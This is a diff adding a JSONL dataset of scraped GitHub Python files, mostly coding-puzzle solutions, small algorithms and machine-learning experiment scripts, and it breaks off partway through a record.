diff --git "a/4109.jsonl" "b/4109.jsonl" new file mode 100644--- /dev/null +++ "b/4109.jsonl" @@ -0,0 +1,1102 @@ +{"seq_id":"2725417317","text":"\ndef CountRectangles(rectangles):\n\n s_d = []\n\n for l,w in rectangles:\n s_d.append(min(l,w))\n\n maxLen = max(s_d)\n count = 0\n\n for d in s_d:\n if d == maxLen:\n count +=1\n return count\n\n\nrect = [[5,8],[3,9],[5,12],[16,5]]\nprint(CountRectangles(rect))","repo_name":"AnmolSahu24/Python-DSA","sub_path":"Array/1725.No. of Rectangles that can form largest square.py","file_name":"1725.No. of Rectangles that can form largest square.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74606519772","text":"class Solution:\n def confusingNumber(self, n: int) -> bool:\n d = {'0':'0','1':'1','6':'9','8':'8','9':'6'}\n a = str(n)\n b = ''\n for i in a:\n if i not in d:\n return False\n else:\n b += d[i]\n b = b[::-1]\n if a == b:\n return False\n return True","repo_name":"kevinjshah2207/LeetCode_Summer_21","sub_path":"confusing-number/confusing-number.py","file_name":"confusing-number.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"10758472682","text":"commands = []\nforward = []\ndown = []\nup = []\n\nforward_values = []\ndown_values = []\nup_values = []\n\nforward_total = 0\ndown_total = 0\nup_total = 0\n\nwith open('AoC-2021/Day 2/input2.txt') as f:\n for line in f:\n commands.append(line.strip())\n\nfor command in commands:\n if 'forward' in command:\n forward.append(command.split()) # Splits the word \"forward\" and value \n if 'down' in command:\n down.append(command.split()) # Splits the word \"down\" and value \n if 'up' in command:\n up.append(command.split()) # Splits the word \"up\" and value \n\nfor command in forward:\n command.pop(0) # Removes the word \"forward\" leaving only the value\n forward_values.append(int(command[0])) # Converts values to int and appends them to a new list\nfor command in down:\n command.pop(0) # Removes the word \"down\" leaving only the value\n down_values.append(int(command[0]))\nfor command in up: \n command.pop(0) # Removes the word \"up\" keaving only the value\n up_values.append(int(command[0]))\n\nforward_total = sum(forward_values) # Adds all forward values\ndown_total = sum(down_values) # Adds all down values\nup_total = sum(up_values) # Adds all up values\n\ndepth = down_total - up_total # \"up\" values decrease the depth, so they are subtracted\nresult = forward_total * depth\n\nprint(result)","repo_name":"nicholasmascioni/AoC-2021","sub_path":"Day 2/2.1.py","file_name":"2.1.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13029497199","text":"from collections import deque\n\ndef breadth_first_search(graph, name):\n result = None\n search_queue = deque()\n search_queue += graph[name]\n searched_already = []\n while search_queue:\n person = search_queue.popleft()\n if person_is_seller(person):\n return person\n else:\n searched_already.append(person)\n search_queue += graph[person]\n\n return result\n\ndef person_is_seller(person):\n return person[-1] == \"m\"\n","repo_name":"sebostian/Python","sub_path":"Misc/BreadthFirstSearch.py","file_name":"BreadthFirstSearch.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41691046474","text":"from itertools import count, islice\r\nfrom math import sqrt\r\n\r\ndef is_prime(n):\r\n\t\"\"\" Determine whether a number n is prime. \"\"\"\r\n\treturn n > 1 and all(n % i for i in islice(count(2), int(sqrt(n) - 1)))\r\n\t\r\nsum_ = 0\r\nfor i in range(2, 2000000):\r\n\tif is_prime(i):\r\n\t\tsum_ += i\r\n\t\t\r\nprint(sum_)","repo_name":"xenoicwyce/project-euler","sub_path":"p10.py","file_name":"p10.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29464157192","text":"import cairosvg\nimport io\nimport matplotlib.pyplot as plt\nimport minishogilib\nimport numpy as np\nimport PIL\nimport simplejson\nimport sys\n\n\ndef main():\n record_path = sys.argv[1]\n\n target_positions = [\n ['4e4d'],\n ['2e3d'],\n ['2e4c'],\n ['3e2d'],\n ['3e4d'],\n ['3e3d'],\n ['2e1d']\n ]\n\n position_counts = [0 for _ in target_positions]\n position_frequency = [[] for _ in target_positions]\n\n sample_iter = 200\n\n with open(record_path) as f:\n counter = 0\n\n while True:\n line = f.readline()\n\n if not line:\n break\n\n data = simplejson.loads(line)\n\n for (i, target_position) in enumerate(target_positions):\n if data['sfen_kif'][:len(target_position)] == target_position:\n position_counts[i] += 1\n\n counter += 1\n\n if counter == sample_iter:\n for i in range(len(target_positions)):\n position_frequency[i].append(position_counts[i] / counter)\n\n position_counts = [0 for _ in target_positions]\n counter = 0\n\n elements = []\n elements.append('')\n elements.append('')\n elements.append('')\n elements.append('Analyzer')\n elements.append('')\n elements.append('')\n\n elements.append('')\n for (i, pf) in enumerate(position_frequency):\n plt.clf()\n\n position = minishogilib.Position()\n position.set_start_position()\n\n for m in target_positions[i]:\n move = position.sfen_to_move(m)\n position.do_move(move)\n\n elements.append('')\n\n elements.append('')\n\n plt.ylim([0, 100])\n plt.grid(linestyle='--')\n y = np.array(pf) * 100\n plt.scatter(range(len(pf) * sample_iter)[::sample_iter], y, s=2)\n\n f = io.BytesIO()\n plt.savefig(f, format='svg')\n elements.append('')\n\n elements.append('')\n\n elements.append('
')\n elements.append(position.to_svg())\n elements.append('')\n elements.append(f.getvalue().decode('utf-8'))\n elements.append('
')\n\n elements.append('')\n elements.append('')\n\n with open('./index.html', 'w') as html:\n html.write('\\n'.join(elements))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Nyashiki/erweitern_55","sub_path":"tools/analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"34750948613","text":"class Node:\n def __init__(self, val, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution:\n def treeToDoublyList(self, root: 'Node') -> 'Node':\n self.head = None\n self.tail = None\n def dfs(node):\n if node is None:\n return\n\n dfs(node.left)\n node = root\n if self.head is None:\n self.head = root\n else:\n self.tail.next = node\n node.left = self.tail\n\n self.tail = node\n dfs(node.right)\n\n dfs(root)\n return self.head\n\n\n","repo_name":"anki08/Leetcode-Solutions","sub_path":"Tree/tree-to-DLL.py","file_name":"tree-to-DLL.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"28546162237","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom . import geom\n\n# PRBM\nt_30 = 0.83\nt_15 = 0.45\nt_10 = 0.27\nang_min = 15/180*np.pi\ntr = np.sum([t_30,0.015,0.05,0.015])/1000\nwr = 0.01\ngamma = 0.85\nKtheta = 2.65\nE = 1.5*1e6*6894.76\n\ndef prbm_k(t,l,w):\n I = w*t**3/12\n k = gamma*Ktheta*E*I/l\n return k\n\ndef tf(ct):\n return t_15/1000 if ct > 0 else t_10/1000\n\ndef sim(x,r,plot=False):\n ls = x[:4]\n cm = x[4]\n ct = x[5]\n wf = x[6]\n\n k = prbm_k(tf(ct),ls[1],wf)\n lk = geom.spring(0,ls,cm)\n\n lks = []\n angs = np.linspace(0,r,50)\n taus = []\n for ang in angs:\n lk = geom.spring(ang,ls,cm)\n theta = geom.pose(lk[2])[1]\n alpha = geom.pose(lk[1])[1]\n beta = geom.pose(lk[0])[1]\n assert np.abs(beta) > ang_min, 'angle between motor arm and crank too small'\n\n # Static analysis\n dtheta = geom.limit_ang(theta-np.pi)\n tauk = k*dtheta\n f_ang = geom.limit_ang(alpha-theta)\n assert np.abs(geom.limit_ang(np.pi-f_ang)) > ang_min, 'angle between flexible beam and coupler too small'\n f = tauk/(ls[1]*gamma+geom.pade)/np.sin(f_ang)\n fp_ang = geom.limit_ang(np.pi+alpha-beta)\n tau = f*np.sin(fp_ang)*ls[3]\n\n # print(theta,alpha,beta,dtheta,f_ang,fp_ang)\n taus.append(tau)\n lks.append(lk)\n\n angs = np.array(angs)\n taus = np.array(taus)\n\n if plot:\n lks_r = [lks[int(n)] for n in np.linspace(0,len(lks)-1,3)]\n bbox = geom.bbox(lks_r)\n plt.figure()\n plt.axis('scaled')\n plt.xlim(bbox[:2])\n plt.ylim(bbox[2:])\n\n for lk in lks_r:\n for link in lk:\n plt.plot(link[:,0],link[:,1],'.-k')\n\n return angs,taus\n","repo_name":"iicfcii/laminate-jumping-leg","sub_path":"anchor/stiffness.py","file_name":"stiffness.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38045168426","text":"\nclass Sensor:\n def __init__(self, pos, beacon):\n self.pos = pos\n self.beacon = beacon\n self.cov = self.get_dist(beacon)\n\n def get_dist(self, z):\n return abs(self.pos[0] - z[0]) + abs(self.pos[1] - z[1])\n\n def cover(self, z):\n return self.get_dist(z) <= self.cov\n\n def covery(self, y):\n return self.get_dist((self.pos[0], y)) <= self.cov\n\nwith open(\"input\", \"r\") as f:\n \n sensors = []\n for line in f.readlines():\n a = line.strip().split(\"=\") \n sensor = (int(a[1].split(\",\")[0]), int(a[2].split(\":\")[0]))\n beacon = (int(a[3].split(\",\")[0]), int(a[4]))\n sensors.append(Sensor(sensor, beacon))\n\ndef merge_intervals(intvs):\n intvs.sort(key=lambda x: x[0])\n new_intvs = []\n i = 0\n j = 1\n \n while i < len(intvs):\n v = intvs[i]\n while j < len(intvs):\n if v[1] >= intvs[j][0] - 1:\n v[1] = max(v[1], intvs[j][1])\n j += 1\n else:\n break\n i = j\n j += 1\n new_intvs.append(v)\n\n return new_intvs\n\nxlim = [0, 4000000]\nylim = [0, 4000000]\n\npos = [0, 0]\npoint = []\nfor y in range(ylim[1]):\n intervals = []\n for i, s in enumerate(sensors):\n if s.covery(y):\n d = s.cov - abs(y - s.pos[1])\n intervals.append([s.pos[0] - d, s.pos[0] + d]) \n v = merge_intervals(intervals)\n \n if len(v) > 1:\n for i in range(len(v)-1):\n if v[i][1] < xlim[0] or v[i+1][0] > xlim[1]-1:\n continue \n elif v[i+1][0] - v[i][1] == 2:\n point = [v[i][1]+1, y] \n break\n else:\n raise Exception(\"More than 1 possible points\")\n\n if point:\n break\n\nprint(\"15b tuning frequency {}\".format(point[0]*4000000+point[1]))\n","repo_name":"JohanRuuskanen/aoc22","sub_path":"15/15b.py","file_name":"15b.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70152829853","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport parsing\nimport display\nimport normalization\nimport gradient_descent\nimport math\n\n# ===================== Initialization =====================\nNormalize = True\nDebug_gradient = False\nDisplay_graph = True\nDisplay_predictions = False\nAdjust_learning_rate = True\nlearning_rate = 0.1 if Normalize == True else 0.000000000015\niterations = 500\n\n# Parsing :\nthetas = parsing.read_thetas()\nraw_dataX, raw_dataY = parsing.read_data()\ndataX, dataY, thetas = normalization.process_data(raw_dataX, raw_dataY, thetas, Normalize)\n\n# Formating new variables :\nx, y = np.array(dataX), np.array(dataY)\nx, y = x.reshape(x.shape[0], 1), y.reshape(y.shape[0], 1)\nX = np.hstack((x, np.ones(x.shape)))\nY = y\nthetas.reverse()\ntheta = np.array(thetas)\ntheta = theta.reshape(theta.shape[0], 1)\n\n# ===================== Start output =====================\ndisplay.start_output(raw_dataX, raw_dataY, X, Y, theta, Normalize)\n\n# ===================== Gradient descent =====================\ntheta, prediction_history = gradient_descent.gradient_descent(X, Y, theta, learning_rate, \\\n iterations, Debug_gradient, Adjust_learning_rate)\n\n# ===================== Data graph =====================\ndisplay.display_graph(dataX, dataY, prediction_history, Display_graph)\n\n# ===================== Denormalizing =====================\nX, Y, final_theta = normalization.denormalize(raw_dataX, raw_dataY, X, Y, theta, Normalize)\n\n# ===================== End output =====================\ndisplay.end_output(final_theta, gradient_descent.cost_function(X, Y, final_theta), X, Display_predictions)\n\n# ===================== Writing new thetas to file =====================\nparsing.write_thetas([final_theta[1][0], final_theta[0][0]])\n","repo_name":"alacrois/42-ft_linear_regression","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28542356066","text":"import webbrowser\n\n\nclass Movie():\n # Saving variable below for future enhancements\n # VALID_RATINGS = [\"G\", \"PG\", \"PG-13\", \"R\"]\n\n # Constructor called from each Instance\n def __init__(self,\n movie_title,\n movie_storyline,\n movie_actors,\n poster_image,\n trailer_youtube):\n self.title = movie_title\n self.storyline = movie_storyline\n self.actors = movie_actors\n self.poster_image_url = poster_image\n self.trailer_youtube_url = trailer_youtube\n\n # Instance Method or Function\n def show_trailer(self):\n webbrowser.open(self.trailer_youtube_url)\n","repo_name":"jeffmicha3ls/movieTrailerProject","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13586165800","text":"# -*-coding:UTF-8 -*\nimport pickle\nfrom Game import *\nfrom Neuron import *\nfrom Player import *\n\nwith open('reseau_neuronal', 'rb') as inp: ns = pickle.load(inp)\n\ngame = Game(15)\n\nchaine = str()\nwhile chaine.lower() != \"q\":\n print(\"Tapez 'Q' pour quitter...\")\n\n print(\"Tapez votre nom de joueur : \")\n chaine = input()\n if chaine.lower() != \"q\":\n player = HumanPlayer(chaine)\n print(\"Bienvenue \", chaine, \" !\")\n\n print(\"Tapez votre mode de jeu (easy, medium, ou hard) : \")\n chaine = input()\n if chaine.lower() in (\"easy\",\"medium\",\"hard\"):\n cpuPlayer = CPUPlayer('Terminator', chaine.lower(), 15)\n cpuPlayer.setNeuronNetwork(ns)\n game.start(cpuPlayer, player, True)\n","repo_name":"DecampsRenan/batongame","sub_path":"classes/finalGame.py","file_name":"finalGame.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23391907131","text":"import cv2\nimport matplotlib.pyplot as plt\n\nimg = cv2.imread(\"../images/sunflower.jpg\", 0)\n\n# show gray scale image\n'''opencv'''\ncv2.imshow(\"img_gray\", img)\ncv2.waitKey()\n\n'''plt'''\nfig = plt.figure()\nax = fig.add_subplot(121)\nax.imshow(img, cmap=\"gray\")\n\nax = fig.add_subplot(122)\nax.imshow(img, cmap=\"gray\", vmin=0, vmax=255)\nplt.show()\n# ------------------------------------------------\n","repo_name":"suzumiyayuhi/traditional_CV_learning","sub_path":"image_processing/chapter2/show_gray_scale_image.py","file_name":"show_gray_scale_image.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"31233092952","text":"import argparse\nimport tqdm\n\nimport torch\nimport pytorch_categorical\nfrom torch.utils.data import DataLoader\nimport os\nimport pytorch_categorical\nfrom multiprocessing import Process, Manager\nfrom embedding_tools.poincare_embeddings_graph import RiemannianEmbedding as PEmbed\nfrom em_tools.poincare_em import RiemannianEM as PEM\nfrom data_tools import corpora_tools\nfrom data_tools import corpora\nfrom data_tools import data_tools\nfrom evaluation_tools import evaluation\nfrom visualisation_tools import plot_tools\nfrom launcher_tools import logger\nfrom optim_tools import optimizer\n\nparser = argparse.ArgumentParser(description='Start an experiment')\nparser.add_argument('--n-disc', metavar='d', dest=\"n_disc\", type=int, default=1,\n help=\"Number of disc used in the experiment\")\nparser.add_argument('--init-lr', dest=\"init_lr\", type=float, default=-1.0,\n help=\"Learning rate for the first embedding step\")\nparser.add_argument('--lr', dest=\"lr\", type=float, default=1,\n help=\"learning rate for embedding\")\nparser.add_argument('--init-alpha', dest=\"init_alpha\", type=float, default=-1.0,\n help=\"alpha for the first embedding step\")\nparser.add_argument('--alpha', dest=\"alpha\", type=float, default=.1,\n help=\"alpha for embedding\")\nparser.add_argument('--init-beta', dest=\"init_beta\", type=float, default=-1.0,\n help=\"beta for the first embedding step\")\nparser.add_argument('--beta', dest=\"beta\", type=float, default=1,\n help=\"beta for embedding\")\nparser.add_argument('--gamma', dest=\"gamma\", type=float, default=1,\n help=\"gamma rate for embedding\")\nparser.add_argument('--n-gaussian', dest=\"n_gaussian\", type=int, default=12,\n help=\"number of gaussian for EM algorithm\")\nparser.add_argument('--dataset', dest=\"dataset\", type=str, default=\"football\",\n help=\"dataset to use for the experiments\")\nparser.add_argument('--walk-lenght', dest=\"walk_lenght\", type=int, default=20,\n help=\"size of random walk\")\nparser.add_argument('--cuda', dest=\"cuda\", action=\"store_true\", default=False,\n help=\"using GPU for operation\")\nparser.add_argument('--epoch', dest=\"epoch\", type=int, default=1,\n help=\"number of loops alternating embedding/EM\")\nparser.add_argument('--epoch-embedding-init', dest=\"epoch_embedding_init\", type=int, default=100,\n help=\"maximum number of epoch for first embedding gradient descent\")\nparser.add_argument('--epoch-embedding', dest=\"epoch_embedding\", type=int, default=10,\n help=\"maximum number of epoch for embedding gradient descent\")\nparser.add_argument('--id', dest=\"id\", type=str, default=\"0\",\n help=\"identifier of the experiment\")\nparser.add_argument('--save', dest=\"save\", action=\"store_true\", default=True,\n help=\"saving results and parameters\")\nparser.add_argument('--precompute-rw', dest='precompute_rw', type=int, default=10,\n help=\"number of random path to precompute (for faster embedding learning) if negative \\\n the random walks is computed on flight\")\nparser.add_argument('--context-size', dest=\"context_size\", type=int, default=4,\n help=\"size of the context used on the random walk\")\nparser.add_argument(\"--negative-sampling\", dest=\"negative_sampling\", type=int, default=10,\n help=\"number of negative samples for loss O2\")\nparser.add_argument(\"--embedding-optimizer\", dest=\"embedding_optimizer\", type=str, default=\"exphsgd\", \n help=\"the type of optimizer used for learning poincaré embedding\")\nparser.add_argument(\"--em-iter\", dest=\"em_iter\", type=int, default=0,\n help=\"Number of EM iterations\")\nparser.add_argument(\"--batch-size\", dest=\"batch_size\", type=int, default=512,\n help=\"Batch number of elements\")\n \nargs = parser.parse_args()\n\n\ndataset_dict = { \"karate\": corpora.load_karate,\n \"football\": corpora.load_football,\n \"flickr\": corpora.load_flickr,\n \"dblp\": corpora.load_dblp,\n \"books\": corpora.load_books,\n \"blogCatalog\": corpora.load_blogCatalog\n }\n\noptimizer_dict = {\"addhsgd\": optimizer.PoincareBallSGDAdd,\n \"exphsgd\": optimizer.PoincareBallSGDExp,\n \"hsgd\": optimizer.PoincareBallSGD,\n \"exphsga\": optimizer.PoincareBallSGAExp}\n\n\nif(args.save):\n print(\"The following options are use for the current experiment \", args)\n os.makedirs(\"RESULTS/\"+args.id+\"/\", exist_ok=True)\n logger_object = logger.JSONLogger(\"RESULTS/\"+args.id+\"/log.json\")\n logger_object.append(vars(args))\n\n# check if dataset exists\n\nif(args.dataset not in dataset_dict):\n print(\"Dataset \" + args.dataset + \" does not exist, please select one of the following : \")\n print(list(dataset_dict.keys()))\n quit()\n\nif(args.embedding_optimizer not in optimizer_dict):\n print(\"Optimizer \" + args.embedding_optimizer + \" does not exist, please select one of the following : \")\n print(list(optimizer_dict.keys()))\n quit()\n\nif(args.init_lr <= 0):\n args.init_lr = args.lr\nif(args.init_alpha < 0):\n args.init_alpha = args.alpha\nif(args.init_beta < 0):\n args.init_beta = args.beta\n\nalpha, beta = args.init_alpha, args.init_beta\n\nprint(\"Loading Corpus \")\nD, X, Y = dataset_dict[args.dataset]()\nprint(\"Creating dataset\")\n# index of examples dataset\ndataset_index = corpora_tools.from_indexable(torch.arange(0,len(D),1).unsqueeze(-1))\nprint(\"Dataset Size -> \", len(D))\nD.set_path(False)\n\n# negative sampling distribution\nfrequency = D.getFrequency()**(3/4)\nfrequency[:,1] /= frequency[:,1].sum()\nfrequency = pytorch_categorical.Categorical(torch.ones(len(frequency))/len(frequency))\n# random walk dataset\nd_rw = D.light_copy()\nd_rw.set_walk(args.walk_lenght, 1.0)\nd_rw.set_path(True)\nd_rw = corpora.ContextCorpus(d_rw, context_size=args.context_size, precompute=args.precompute_rw)\n# neigbhor dataset\nd_v = D.light_copy()\nd_v.set_walk(1, 1.0)\n\nprint(d_rw[1][0].size())\n\nprint(\"Merging dataset\")\nembedding_dataset = corpora_tools.zip_datasets(dataset_index,\n corpora_tools.select_from_index(d_v, element_index=0),\n d_rw\n )\ntraining_dataloader = DataLoader(embedding_dataset, \n batch_size=args.batch_size, \n shuffle=True,\n num_workers=8,\n collate_fn=data_tools.PadCollate(dim=0),\n drop_last=False\n )\n\nrepresentation_d = []\npi_d = []\nmu_d = []\nsigma_d = []\ndisc_log = {}\nfor disc in range(args.n_disc):\n alpha, beta = args.init_alpha, args.init_beta\n embedding_alg = PEmbed(len(embedding_dataset), lr=args.init_lr, cuda=args.cuda, negative_distribution=frequency,\n optimizer_method=optimizer_dict[args.embedding_optimizer])\n em_alg = PEM(args.n_gaussian, init_mod=\"kmeans-hyperbolic\", verbose=True)\n pi, mu, sigma = None, None, None\n pik = None\n epoch_embedding = args.epoch_embedding_init\n log_sigma = []\n for i in tqdm.trange(args.epoch):\n if(i==1):\n embedding_alg.set_lr(args.lr)\n alpha, beta = args.alpha, args.beta\n epoch_embedding = args.epoch_embedding\n\n embedding_alg.fit(training_dataloader, alpha=alpha, beta=beta, gamma=args.gamma, max_iter=epoch_embedding,\n pi=pik, mu=mu, sigma=sigma, negative_sampling=args.negative_sampling)\n em_alg.fit(embedding_alg.get_PoincareEmbeddings().cpu(), max_iter=args.em_iter)\n pi, mu, sigma = em_alg.getParameters()\n pik = em_alg.getPik(embedding_alg.get_PoincareEmbeddings().cpu())\n\n representation_d.append(embedding_alg.get_PoincareEmbeddings().cpu())\n pi_d.append(pi)\n mu_d.append(mu)\n sigma_d.append(sigma)\n current_accuracy = evaluation.accuracy_cross_validation(representation_d[-1], D.Y, pi, mu, sigma, 5, verbose=False)\n print(\"\\nPerformances disc \"+str(disc+1)+\"-> \" ,current_accuracy,\"\\n\")\n if(args.save):\n logger_object.append({\"disc-\"+str(disc):{\"accuracy\": current_accuracy}})\n\n#evaluate performances on all disc\ntotal_accuracy = evaluation.accuracy_disc_product(representation_d, D.Y, pi_d, mu_d, sigma_d, verbose=False)\nprint(\"\\nPerformances joined -> \" ,\n total_accuracy\n)\nlogger_object.append({\"accuracy\": total_accuracy})\n#evaluate performances on all disc\ntotal_accuracy = evaluation.accuracy_disc_kmeans(representation_d[0], D.Y, mu_d[0], verbose=False)\nprint(\"\\nPerformances kmeans-> \" ,\n total_accuracy\n)\nlogger_object.append({\"accuracy_kmeans\": total_accuracy})\n#TODO: Clean the code below\n\nif(args.save):\n import matplotlib.pyplot as plt\n import matplotlib.colors as plt_colors\n import numpy as np\n torch.save(representation_d, \"RESULTS/\"+args.id+\"/embeddings.t7\")\n torch.save( {\"pi\": pi_d, \"mu\":mu_d, \"sigma\":sigma_d}, \"RESULTS/\"+args.id+\"/pi_mu_sigma.t7\")\n unique_label = np.unique(sum([ y for k, y in D.Y.items()],[]))\n colors = []\n\n for i in range(len(representation_d[0])):\n colors.append(plt_colors.hsv_to_rgb([D.Y[i][0]/(len(unique_label)),0.5,0.8]))\n\n\n\n plot_tools.plot_embedding_distribution_multi(representation_d, pi_d, mu_d, sigma_d, \n labels=None, N=100, colors=colors, \n save_path=\"RESULTS/\"+args.id+\"/fig.pdf\")\n\n\n print({\"pi\": pi_d, \"mu\":mu_d, \"sigma\":sigma_d})\n\n","repo_name":"tgeral68/EuuzAIiFDS","sub_path":"launcher_tools/experiment_disc_prod.py","file_name":"experiment_disc_prod.py","file_ext":"py","file_size_in_byte":9770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34751249893","text":"import numpy as np\nclass Solution:\n def maxProfit(self, prices):\n n = len(prices)\n buy_dp = np.zeros((n+1), dtype=int)\n sell_dp = np.zeros((n+1), dtype=int)\n buy_dp[0] = -prices[0]\n sell_dp[0] = 0\n for i in range(1, len(prices)+1):\n buy_dp[i] = max(buy_dp[i-1], -prices[i-1])\n sell_dp[i] = max(sell_dp[i-1], buy_dp[i-1]+prices[i-1])\n return sell_dp[-1]\n\nif __name__ == '__main__':\n sol = Solution()\n print(sol.maxProfit(prices = [7,1,5,3,6,4]))\n","repo_name":"anki08/Leetcode-Solutions","sub_path":"miscelleneous/buy_and_sell_stocks.py","file_name":"buy_and_sell_stocks.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"14538199744","text":"#%%\ndef sort_012(input_list):\n '''\n left_idx tracks the location of 1st 1 and\n right_idx tracks the location of the 1st 2.\n Using the scanning_idx, this iterates over every element once O(n) and allocate (in-place)\n all 0s to the left of the 1s,\n and all 2s to the right of the 1s.\n Therefore the overall time complexity is 0(n).\n\n '''\n left_idx = 0\n right_idx = len(input_list) - 1\n scanning_idx = 0\n\n while scanning_idx <= right_idx:\n if input_list[scanning_idx] == 0:\n input_list[left_idx], input_list[scanning_idx] = input_list[scanning_idx], input_list[left_idx],\n scanning_idx += 1\n left_idx += 1\n\n elif input_list[scanning_idx] == 1:\n scanning_idx += 1\n elif input_list[scanning_idx] == 2:\n input_list[right_idx], input_list[scanning_idx] = input_list[scanning_idx], input_list[right_idx]\n right_idx -= 1\n\n return input_list\n\n\ndef testUdacity():\n test1 = [0, 0, 2, 2, 2, 1, 1, 1, 2, 0, 2]\n test2 = [2, 1, 2, 0, 0, 2, 1, 0, 1, 0, 0, 2, 2, 2, 1, 2, 0, 0, 0, 2, 1, 0, 2, 0, 0, 1]\n test3 = [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2]\n assert sort_012(test1) == sorted(test1)\n assert sort_012(test2) == sorted(test2)\n assert sort_012(test3) == sorted(test3)\n\ndef testEdgeCase1():\n '''If input is an empty arr'''\n assert sort_012([]) == [], 'Empty array should return empty array'\n\ndef testEdgeCase2():\n '''if input only contains 0, 1 or 2'''\n assert sort_012([0,0,0,0,0]) == [0,0,0,0,0], f'Should return all 0s, but {sort_012([0,0,0,0,0])} was returned'\n assert sort_012([1 for i in range(1,10)]) == [1 for i in range(1,10)], f'Should return all 1s, but {sort_012([1 for i in range(1,10)])} was returned'\n assert sort_012([2 for i in range(1,10)]) == [2 for i in range(1,10)], f'Should return all 2s, but {sort_012([2 for i in range(1,10)])} was returned'\n\nif __name__ == '__main__':\n testEdgeCase1()\n testEdgeCase2()\n testUdacity()\n","repo_name":"CephasTanLJ/Udacity_DataStructNAlg_3","sub_path":"problem4.py","file_name":"problem4.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29050561630","text":"import pandas as pd\r\nimport numpy as np\r\nfrom basic_layer.NN_adam import NN\r\nfrom util.batcher import batcher\r\nfrom basic_layer.VRNN import VRNN\r\nfrom basic_layer.LSTMs import bi_lstm_layer as lstm_layer\r\nfrom basic_layer.Self_Attention import Self_Attention\r\nfrom data.datahandle import input_prepare\r\nfrom data.output_handel import output_handle\r\n# import tensorflow.compat.v1 as tf\r\n# tf.disable_v2_behavior()\r\nimport tensorflow as tf\r\nimport numpy.linalg as npl\r\n\r\nclass DMAN(NN):\r\n def __init__(self, config): #定义超参数,从配置文件调入其他参数\r\n super(DMAN, self).__init__(config)\r\n self.seqlen = 12\r\n self.block_len = 6\r\n self.block_num = 5\r\n self.history_num = 25\r\n self.all_block_len = self.block_len*self.block_num\r\n self.test_loss = [9999] * 20\r\n if config != None:\r\n self.edim = config['edim']\r\n self.label_dim = config['label_dim']\r\n self.epoch = config['nepoch']\r\n self.fmy_output_path = config['fmy_output_path']\r\n self.model_save_path = config['model_save_path']\r\n self.batch_size = config['batch_size']\r\n self.gpu_num = config['gpu_num']\r\n self.model_name = config['model_name']\r\n else:\r\n self.edim = None\r\n self.label_dim = None\r\n self.epoch = None\r\n self.fmy_output_path = None\r\n self.model_save_path = None\r\n self.batch_size = None\r\n self.gpu_num = None\r\n self.model_name = None\r\n\r\n def set_placeholder(self): #定义网络输入和输出的形状格式\r\n self.inputs = tf.placeholder(\r\n tf.float32,\r\n [None, None, self.all_block_len, self.edim], # [batch_sie, sequence_len, 15, 29]\r\n name=\"inputs\"\r\n )\r\n\r\n self.labels = tf.placeholder(\r\n tf.float32,\r\n [None, None, self.label_dim], # [bathc_size, sequence_len, label_dim]\r\n name=\"labels\"\r\n )\r\n\r\n shape = tf.shape(self.inputs)\r\n batch_size = shape[0]\r\n sequence_len = shape[1]\r\n print('label3')\r\n print(shape)\r\n \r\n self.reshape_inputs = tf.reshape(self.inputs, [batch_size, sequence_len, -1, self.block_len, self.edim]) # [batch_sie, sequence_len, 5, 3, edim]\r\n\r\n return self.reshape_inputs, self.labels\r\n\r\n def lstm_layer1(self, inputs): #定义底层LSTM(下采样层),return_sequence = ?\r\n \"\"\"\r\n input: [batch_sie, sequence_len, 5, 3, 29]\r\n output: [batch_sie, sequence_len, 5, 3, 64]\r\n \"\"\"\r\n with tf.variable_scope('layer1'):\r\n shape = tf.shape(inputs) # inputs: [batch_sie, sequence_len, 5, 3, 29]\r\n num1, num2, num3 = shape[0], shape[1], shape[2]\r\n\r\n inputs = tf.reshape(inputs, [num1*num2*num3, -1, 29])\r\n lstm_output, _ = lstm_layer(inputs, 64, num1*num2*num3)\r\n lstm_output = tf.reshape(lstm_output, [num1, num2, num3, -1, 64])\r\n lstm_output = 